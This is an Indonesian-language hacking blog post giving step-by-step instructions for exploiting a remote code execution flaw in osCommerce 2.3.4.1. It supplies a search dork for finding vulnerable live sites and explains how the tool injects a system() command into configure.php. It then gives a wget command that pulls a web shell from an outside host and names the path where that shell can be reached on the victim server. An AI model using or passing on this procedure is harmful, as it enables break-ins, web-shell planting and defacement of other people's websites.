Breaking

Senin, 23 September 2019

OsCommerce 2.3.4.1 Remote Code Execution

Selamat siang ges bek lagi dengan aku anak nolep gada kerjaan :'(, Karena gada kerjaan makanya tak ngego-blog lagi muehehe.

Siang ini w share exploit OsCommerce 2.3.4.1 Remote Code Execution. Disini aink pake tool dari Simon Scanell ref from Exploit-DB. Download tool
Simpan dengan ekstensi .py
Tools ini berguna untuk menyisipkan script remote command ke dalam file config web target yg ada pada configure.php
Dork:
inurl:/oscommerce-2.3.4.1

Sebelum jalanin toolnya edit dulu toolnya di bagian base_url dan target_url edit jadi web target mu.


Perhatikan gambar diatas, pada bagian system("ls -la"); adalah command untuk kita mengeksekusi web target.
NB: ls -la adalah perintah untuk memunculkan dir listing nya

Jalankan toolnya dan biarkan dia bekerja
python2 tool.py
Jika seperti itu berarti sukses :D
Bagaimana cara melihat list dir-nya? Ke file configure.php (salin aja url yg dibawah itu)
Bakekok muncul mzz :"v

Upload shell tinggal wget ajh bng ganti ls -la nya jadi wget (wget http://linkshell.com/shell.txt -O shell.php) akses Shell di ~> /oscommerce-2.3.4.1/catalog/install/includes/shell.php
Selesai tinggal mpsh mpsh web na hehehe


Tidak ada komentar:

Posting Komentar